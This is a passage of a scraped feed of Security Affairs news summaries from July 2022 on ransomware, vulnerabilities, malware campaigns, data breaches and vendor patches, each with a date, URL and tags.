ransomware operation that is targeting organizations worldwide using a double-extortion model, BleepingComputer reported. The ransomware operation has been active at least since May 2022 and already claimed to have breached multiple organizations. Victims of the ransomware reported that […] ]]> 2022-07-11T07:50:42+00:00 https://securityaffairs.co/wordpress/133098/malware/0mega-ransomware.html www.secnews.physaphae.fr/article.php?IdArticle=5658613 False Ransomware None None Security Affairs - Blog Secu Bad news for the owners of several Honda models, the Rolling-PWN Attack vulnerability can allow unlocking their vehicles. A team of security Researchers Kevin2600 and Wesley Li from Star-V Lab independently discovered a flaw in Honda models, named the Rolling-PWN Attack vulnerability (CVE-2021-46145), that can allow unlocking their vehicles- A remote keyless entry system (RKE) […] ]]> 2022-07-10T17:40:13+00:00 https://securityaffairs.co/wordpress/133090/hacking/honda-rolling-pwn-attack.html www.secnews.physaphae.fr/article.php?IdArticle=5649896 False Vulnerability None None Security Affairs - Blog Secu French virtual mobile telephone operator La Poste Mobile was hit by a ransomware attack that impacted administrative and management services.  The ransomware attack hit the virtual mobile telephone operator La Poste Mobile on July 4 and paralyzed administrative and management services.  The company pointed out that threat actors may have accessed data of its customers, […] ]]> 2022-07-10T16:07:44+00:00 https://securityaffairs.co/wordpress/133080/cyber-crime/la-poste-mobile-ransomware.html www.secnews.physaphae.fr/article.php?IdArticle=5648528 False Ransomware,Threat None None Security Affairs - Blog Secu A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs for free in your email box. Apple Lockdown Mode will protect users against highly targeted cyberattacks Fortinet addressed multiple vulnerabilities in several products Rozena backdoor delivered by exploiting the Follina bug Ongoing Raspberry Robin campaign leverages […] ]]> 2022-07-10T14:41:29+00:00 https://securityaffairs.co/wordpress/133075/breaking-news/security-affairs-newsletter-round-373-by-pierluigi-paganini.html www.secnews.physaphae.fr/article.php?IdArticle=5647150 False None None 5.0000000000000000 Security Affairs - Blog Secu Apple plans to introduce a security feature, called Lockdown Mode, to protect its users against “highly targeted cyberattacks.” The recent wave of sophisticated attacks against Apple users (i.e. Pegasus, DevilsTongue, and Hermit) urged the tech giant to develop a new security feature, called Lockdown Mode, to protect its users against highly targeted cyberattacks. The new feature will be implemented in iOS 16, iPadOS […] ]]> 2022-07-09T16:53:07+00:00 https://securityaffairs.co/wordpress/133065/mobile-2/apple-lockdown-mode.html www.secnews.physaphae.fr/article.php?IdArticle=5631802 False Cloud APT 37 None Security Affairs - Blog Secu Fortinet released security patches to address multiple High-Severity vulnerabilities in several products of the vendor. Fortinet addressed multiple vulnerabilities in several products of the vendor. Impacted products are FortiADC, FortiAnalyzer, FortiManager, FortiOS, FortiProxy, FortiClient, FortiDeceptor, FortiEDR, FortiNAC, FortiSwitch, FortiRecorder, and FortiVoiceEnterprise. Four of the fixed issues have been rated as a “high” severity, they are […] ]]> 2022-07-09T13:17:53+00:00 https://securityaffairs.co/wordpress/133059/security/fortinet-multiple-issues-several-products.html www.secnews.physaphae.fr/article.php?IdArticle=5629585 False None None None Security Affairs - Blog Secu Threat actors are exploiting the disclosed Follina Windows vulnerability to distribute the previously undocumented Rozena backdoor. Fortinet FortiGuard Labs researchers observed a phishing campaign that is leveraging the recently disclosed Follina security vulnerability (CVE-2022-30190, CVSS score 7.8) to distribute a previously undocumented backdoor on Windows systems. The Follina issue is a remote code execution vulnerability […] ]]> 2022-07-09T12:36:19+00:00 https://securityaffairs.co/wordpress/133051/hacking/follina-bug-rozena-backdoor.html www.secnews.physaphae.fr/article.php?IdArticle=5628846 False Vulnerability None None Security Affairs - Blog Secu Cybereason researchers are warning of a wave of attacks spreading the wormable Windows malware Raspberry Robin. Raspberry Robin is a Windows worm discovered by cybersecurity researchers from Red Canary, the malware propagates through removable USB devices. The malicious code uses Windows Installer to reach out to QNAP-associated domains and download a malicious DLL. The malware uses […] ]]> 2022-07-09T10:04:58+00:00 https://securityaffairs.co/wordpress/133039/cyber-crime/raspberry-robin-infection-attacks.html www.secnews.physaphae.fr/article.php?IdArticle=5626635 False Malware None None Security Affairs - Blog Secu Experts documented the evolution of the LockBit ransomware that leverages multiple techniques to infect targets and evade detection. The Cybereason Global Security Operations Center (GSOC) Team published the Cybereason Threat Analysis Reports that investigates the threat landscape and provides recommendations to mitigate their attacks. The researchers focused on the evolution of the Lockbit ransomware, they detailed two infections occurring […] ]]> 2022-07-09T04:59:16+00:00 https://securityaffairs.co/wordpress/133027/cyber-crime/lockbit-2-0-evolution.html www.secnews.physaphae.fr/article.php?IdArticle=5622937 False Ransomware,Threat None None Security Affairs - Blog Secu Cisco fixed a critical vulnerability in the Cisco Expressway series and TelePresence Video Communication Server (VCS) products. Cisco released security patches to address a critical vulnerability, tracked as CVE-2022-20812 (CVSS score of 9.0), in the Expressway series and TelePresence Video Communication Server (VCS). A remote attacker can trigger the flaw to overwrite files on the […] ]]> 2022-07-08T18:41:45+00:00 https://securityaffairs.co/wordpress/133020/security/cisco-cisco-expressway-flaw.html www.secnews.physaphae.fr/article.php?IdArticle=5615456 False Vulnerability None None Security Affairs - Blog Secu Emsisoft has released a free decryption tool that allows victims of the AstraLocker and Yashma ransomware to recover their files without paying a ransom. Cybersecurity firm Emsisoft released a free decryptor tool that allows victims of the AstraLocker and Yashma ransomware to recover their files without paying a ransom. The security firm states that the […] ]]> 2022-07-08T14:04:16+00:00 https://securityaffairs.co/wordpress/133014/malware/emsisoft-astralocker-yashma-decryptor.html www.secnews.physaphae.fr/article.php?IdArticle=5611884 False Ransomware,Tool None None Security Affairs - Blog Secu This is a transcription of my complete interview with the program NEWSFEED at TRT, during which we discussed NGL software and the risks of bullying. Why are anonymous social apps like NGL cause for concern? What exactly makes them dangerous for minors? We have long debated the potential impact of social media on the mental […] ]]> 2022-07-08T10:59:40+00:00 https://securityaffairs.co/wordpress/133006/social-networks/anonymous-social-app-ngl-risks.html www.secnews.physaphae.fr/article.php?IdArticle=5609073 False None None None Security Affairs - Blog Secu The operators behind the TrickBot malware are systematically targeting Ukraine since the beginning of the war in February 2022. IBM researchers collected evidence indicating that the Russia-based cybercriminal Trickbot group (aka Wizard Spider, DEV-0193, ITG23) has been systematically attacking Ukraine since the beginning of the Russian invasion of the country. Since February, the Conti ransomware […] ]]> 2022-07-08T10:25:18+00:00 https://securityaffairs.co/wordpress/132999/cyber-crime/trickbot-systematically-attacking-ukraine.html www.secnews.physaphae.fr/article.php?IdArticle=5609074 False Ransomware,Malware None None Security Affairs - Blog Secu Taiwanese vendor QNAP wars of a new strain of ransomware, dubbed Checkmate, that is targeting its NAS devices. The Taiwanese vendor QNAP is warning of a new family of ransomware targeting its NAS devices using weak passwords. Threat actors are targeting devices exposed online with the SMB service enabled, they perform brute-force attacks against accounts […] ]]> 2022-07-08T07:23:07+00:00 https://securityaffairs.co/wordpress/132989/malware/checkmate-ransomware-targets-qnap-nas.html www.secnews.physaphae.fr/article.php?IdArticle=5606964 False Ransomware,Threat None None Security Affairs - Blog Secu Researchers uncovered a large-scale cryptocurrency mining campaign targeting the NPM JavaScript package repository. Checkmarx researchers spotted a new large-scale cryptocurrency mining campaign, tracked as CuteBoi, that is targeting the NPM JavaScript package repository. Threat actors behind the campaign published 1,283 malicious modules in the repository and used over 1,000 different user accounts. The researchers uncovered […] ]]> 2022-07-07T20:08:30+00:00 https://securityaffairs.co/wordpress/132983/cyber-crime/cuteboi-cryptomining-campaign-npm.html www.secnews.physaphae.fr/article.php?IdArticle=5599211 False Threat None None Security Affairs - Blog Secu US authorities have issued a joint advisory warning of North Korea-linked APTs using Maui ransomware in attacks against the Healthcare sector. The FBI, CISA, and the U.S. Treasury Department issued a joint advisory that warn of North-Korea-linked threat actors using Maui ransomware in attacks aimed at organizations in the Healthcare sector. “The Federal Bureau of […] ]]> 2022-07-07T13:49:58+00:00 https://securityaffairs.co/wordpress/132978/malware/maui-ransomware-joint-alert.html www.secnews.physaphae.fr/article.php?IdArticle=5594661 False Ransomware,Threat None None Security Affairs - Blog Secu I’m proud to announce that the European Union Agency for Cybersecurity, ENISA, has released the Threat Landscape Methodology. Policy makers, risk managers and information security practitioners need up-to-date and accurate information on the current threat landscape, supported by threat intelligence. The EU Agency for Cybersecurity (ENISA) Threat Landscape report has been published on an annual […] ]]> 2022-07-07T10:16:53+00:00 https://securityaffairs.co/wordpress/132973/security/enis-athreat-landscape-methodology.html www.secnews.physaphae.fr/article.php?IdArticle=5592779 False Threat None None Security Affairs - Blog Secu Cybersecurity researchers warn of new malware, tracked as OrBit, which is a fully undetected Linux threat. Cybersecurity researchers at Intezer have uncovered a new Linux malware, tracked as OrBit, that is still undetected. The malware can be installed as a volatile implant either by achieving persistence on the compromised systems. The malware implements advanced evasion […] ]]> 2022-07-07T09:34:15+00:00 https://securityaffairs.co/wordpress/132966/hacking/orbit-linux-malware.html www.secnews.physaphae.fr/article.php?IdArticle=5592154 False Malware None None Security Affairs - Blog Secu The development team behind the OpenSSL project fixed a high-severity bug in the library that could potentially lead to remote code execution. The maintainers of the OpenSSL project fixed a high-severity heap memory corruption issue, tracked as CVE-2022-2274, affecting the popular library. This bug makes the RSA implementation with 2048 bit private keys incorrect on such machines and triggers […] ]]> 2022-07-07T07:50:59+00:00 https://securityaffairs.co/wordpress/132939/security/openssl-3-0-5-fixes-rce.html www.secnews.physaphae.fr/article.php?IdArticle=5590901 False Guideline None None Security Affairs - Blog Secu Hotel chain Marriott International suffered a new data breach, a threat actor has stolen 20GB from the company. Hotel chain Marriott International confirmed it has suffered a new data breach after a threat actor stole 20GB of files from one of its properties. The attacker compromised the network at the BWI Airport Marriott Maryland  (BWIA), […] ]]> 2022-07-06T23:08:11+00:00 https://securityaffairs.co/wordpress/132943/data-breach/marriott-new-data-breach.html www.secnews.physaphae.fr/article.php?IdArticle=5585378 False Data Breach,Threat None None Security Affairs - Blog Secu Experts observed an increase in malicious activity targeting law enforcement agencies at the beginning of Q2 2022. Resecurity, a Los Angeles-based cybersecurity company protecting Fortune 500 companies worldwide, has registered an increase in malicious activity targeting law enforcement agencies at the beginning of Q2 2022. Threat actors are hacking email and other accounts which belong […] ]]> 2022-07-06T17:34:14+00:00 https://securityaffairs.co/wordpress/132929/cyber-crime/cyberattacks-against-law-enforcement.html www.secnews.physaphae.fr/article.php?IdArticle=5581263 False Threat None None Security Affairs - Blog Secu Threat actors are abusing legitimate adversary simulation software BRc4 in their campaigns to evade detection. Researchers from Palo Alto Networks Unit 42 discovered that a sample uploaded to the VirusTotal database on May 19, 2022 and considered benign by almost all the antivirus, was containing a payload associated with Brute Ratel C4 (BRc4), a new red-teaming and […] ]]> 2022-07-06T15:20:36+00:00 https://securityaffairs.co/wordpress/132922/hacking/brc4-used-in-attacks.html www.secnews.physaphae.fr/article.php?IdArticle=5579981 False Tool None None Security Affairs - Blog Secu Hive ransomware operators have improved their file-encrypting module by migrating to Rust language and adopting a more sophisticated encryption method. The operators of the Hive ransomware upgraded their malware by migrating the malware to the Rust language and implementing a more sophisticated encryption method, Microsoft researchers warn. “The upgrades in the latest variant are effectively […] ]]> 2022-07-06T09:38:38+00:00 https://securityaffairs.co/wordpress/132914/malware/hive-ransomware-new-variant.html www.secnews.physaphae.fr/article.php?IdArticle=5576358 False Ransomware,Malware None None Security Affairs - Blog Secu Researchers from ReversingLabs discovered tens of malicious NPM packages stealing data from apps and web forms. Researchers from ReversingLabs discovered a couple of dozen NPM packages that included malicious code designed to steal data from apps and web forms on websites that included the modules. The malicious NPM modules were delivered as part of a […] ]]> 2022-07-06T06:59:29+00:00 https://securityaffairs.co/wordpress/132904/malware/fake-npm-packages-stealing-data.html www.secnews.physaphae.fr/article.php?IdArticle=5574604 False None None None Security Affairs - Blog Secu Iran's Fars News Agency reported that a massive cyberattack hit operating systems and servers of the Tel Aviv Metro. Iran's Fars News Agency reported on Monday that operating systems and servers of the Tel Aviv Metro were hit by a massive cyberattack. The rail system is still under construction and according to The Jerusalem Post, […] ]]> 2022-07-05T14:59:54+00:00 https://securityaffairs.co/wordpress/132897/hacking/tel-aviv-metro-company-attacked.html www.secnews.physaphae.fr/article.php?IdArticle=5563581 False None None None Security Affairs - Blog Secu The Cyber Police of Ukraine arrested nine members of a cybercriminal gang that has stolen 100 million hryvnias via phishing attacks. The Cyber Police of Ukraine arrested nine members of a cybercriminal organization that stole 100 million hryvnias via phishing attacks. The crooks created more than 400 phishing sites for obtaining the banking data of […] ]]> 2022-07-05T14:29:21+00:00 https://securityaffairs.co/wordpress/132891/cyber-crime/cyber-police-of-ukraine-phishing.html www.secnews.physaphae.fr/article.php?IdArticle=5563582 False None None None Security Affairs - Blog Secu Threat actors compromised the Twitter and YouTube accounts of the British Army to promote online crypto scams. The Twitter and YouTube accounts of the British Army were used to promote NFT and other crypto scams. The YouTube account was used to transmit an older Elon Musk clip that attempts to trick users into visiting cryptocurrency scam […] ]]> 2022-07-05T09:17:05+00:00 https://securityaffairs.co/wordpress/132876/hacking/british-army-accounts-hacked.html www.secnews.physaphae.fr/article.php?IdArticle=5559133 False None None None Security Affairs - Blog Secu AstraLocker ransomware operators told BleepingComputer they’re shutting down their operations and are releasing decryptors. AstraLocker ransomware operators told BleepingComputer they’re shutting down the operation and provided decryptors to the VirusTotal malware analysis platform. AstraLocker is based on the source code of the Babuk Locker (Babyk) ransomware that was leaked online on June 2021. BleepingComputer tested the […] ]]> 2022-07-05T07:44:27+00:00 https://securityaffairs.co/wordpress/132871/malware/astralocker-ransomware-shut-down.html www.secnews.physaphae.fr/article.php?IdArticle=5558384 False Ransomware,Malware None None Security Affairs - Blog Secu Google addressed a high-severity zero-day Chrome vulnerability actively exploited in the wild, it is the fourth zero-day patched in 2022. Google has released Chrome 103.0.5060.114 for Windows to fix a high-severity zero-day Chrome vulnerability, tracked as CVE-2022-2294, which is actively exploited in the wild. The flaw is a heap buffer overflow that resides in the […] ]]> 2022-07-04T21:16:22+00:00 https://securityaffairs.co/wordpress/132863/hacking/4th-chrome-zero-day.html www.secnews.physaphae.fr/article.php?IdArticle=5554822 True Vulnerability None None Security Affairs - Blog Secu Threat actors claim to have breached a database belonging to Shanghai police and stole the data of a billion Chinese residents. Unknown threat actors claimed to have obtained data of a billion Chinese residents after breaching a database of the Shanghai police. If the incident will be confirmed, this data breach is the largest one […] ]]> 2022-07-04T18:37:06+00:00 https://securityaffairs.co/wordpress/132860/data-breach/chinese-residents-data-hacking-forum.html www.secnews.physaphae.fr/article.php?IdArticle=5568431 True Data Breach,Threat None None Security Affairs - Blog Secu Threat actors claim to have breached a database belonging to Shanghai police and stole the data of a billion Chinese residents. Unknown threat actors claimed to have obtained data of a billion Chinese residents after breaching a database of the Shanghai police. If the incident will be confirmed, this data breach is the largest one […] ]]> 2022-07-04T18:37:06+00:00 https://securityaffairs.co/wordpress/132860/data-breach/chinese-residents-data-dark-web.html www.secnews.physaphae.fr/article.php?IdArticle=5553246 False Data Breach,Threat None None Security Affairs - Blog Secu The development team behind the Django Project has addressed a high-severity SQL Injection flaw in its framework. Django is a free and open-source, Python-based web framework that follows the model–template–views (MTV) architectural pattern. Django is maintained by the independent organization Django Software Foundation. The latest releases of the framework, Django 4.0.6 and 3.2.14, addressed a high-severity SQL […] ]]> 2022-07-04T14:49:21+00:00 https://securityaffairs.co/wordpress/132853/security/django-framework-sql-injection.html www.secnews.physaphae.fr/article.php?IdArticle=5551635 False None None None Security Affairs - Blog Secu Bug bounty platform HackerOne disclosed that a former employee improperly accessed security reports submitted to claim additional bounties The vulnerability coordination and bug bounty platform HackerOne disclosed that a former employee improperly accessed security reports submitted by white-hat hackers to claim additional bounties. The investigation started on June 22nd, 2022, when a customer asked the […] ]]> 2022-07-04T09:44:23+00:00 https://securityaffairs.co/wordpress/132846/cyber-crime/hackerone-incident.html www.secnews.physaphae.fr/article.php?IdArticle=5549291 False Vulnerability None None Security Affairs - Blog Secu The Threat Report Portugal: Q2 2022 compiles data collected on the malicious campaigns that occurred from March to June, Q2, 2022. The Portuguese Abuse Open Feed 0xSI_f33d is an open sharing database with the ability to collect indicators from multiple sources, developed and maintained by Segurança-Informática. This feed is based on automatic searches and is supported by a […] ]]> 2022-07-04T08:05:41+00:00 https://securityaffairs.co/wordpress/132842/security/threat-report-portugal-q2-2022.html www.secnews.physaphae.fr/article.php?IdArticle=5548929 False Threat None None Security Affairs - Blog Secu US Critical Infrastructure Security Agency (CISA) adds CVE-2022-26925 Windows LSA flaw to its Known Exploited Vulnerabilities Catalog. In May the US CISA removed the CVE-2022-26925 Windows LSA vulnerability from its Known Exploited Vulnerabilities Catalog due to Active Directory (AD) certificate authentication problems observed after the installation of Microsoft’s May 2022 Patch Tuesday security updates. “CISA […] ]]> 2022-07-04T07:16:39+00:00 https://securityaffairs.co/wordpress/132830/security/cisa-orders-patch-cve-2022-26925.html www.secnews.physaphae.fr/article.php?IdArticle=5548501 False Vulnerability None None Security Affairs - Blog Secu Jenkins security team disclosed tens of flaws affecting 29 plugins for the Jenkins automation server, most of them are yet to be patched. Jenkins is the most popular open-source automation server, it is maintained by CloudBees and the Jenkins community. The automation server supports developers build, test and deploy their applications, it has hundreds of thousands […] ]]> 2022-07-03T21:15:49+00:00 https://securityaffairs.co/wordpress/132836/security/jenkins-plugins-zero-day-flaws.html www.secnews.physaphae.fr/article.php?IdArticle=5541067 False None None None Security Affairs - Blog Secu Microsoft announced that the Windows worm Raspberry Robin has already infected the networks of hundreds of organizations. Raspberry Robin is a Windows worm discovered by cybersecurity researchers from Red Canary, the malware propagates through removable USB devices. The malicious code uses Windows Installer to reach out to QNAP-associated domains and download a malicious DLL. The […] ]]> 2022-07-03T17:32:54+00:00 https://securityaffairs.co/wordpress/132826/malware/microsoft-raspberry-robin-spreading.html www.secnews.physaphae.fr/article.php?IdArticle=5537884 False Malware None None Security Affairs - Blog Secu A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs for free in your email box. The role of Social Media in modern society – Social Media Day 22 interview Experts shared PoC exploit code for RCE in Zoho ManageEngine ADAudit Plus tool A ransomware attack […] ]]> 2022-07-03T16:10:18+00:00 https://securityaffairs.co/wordpress/132822/breaking-news/security-affairs-newsletter-round-372-by-pierluigi-paganini.html www.secnews.physaphae.fr/article.php?IdArticle=5537086 False Ransomware,Tool None None Security Affairs - Blog Secu Google Project Zero states that in H1 2022 at least half of zero-day issues exploited in attacks were related to not properly fixed old flaws. Google Project Zero researcher Maddie Stone published a blog post that resumes her speech at the FIRST conference in June 2022, the presentation is titled “0-day In-the-Wild Exploitation in 2022…so […] ]]> 2022-07-03T13:31:15+00:00 https://securityaffairs.co/wordpress/132813/security/h1-2022-zero-day-variants-previous-flaws.html www.secnews.physaphae.fr/article.php?IdArticle=5534696 False None None None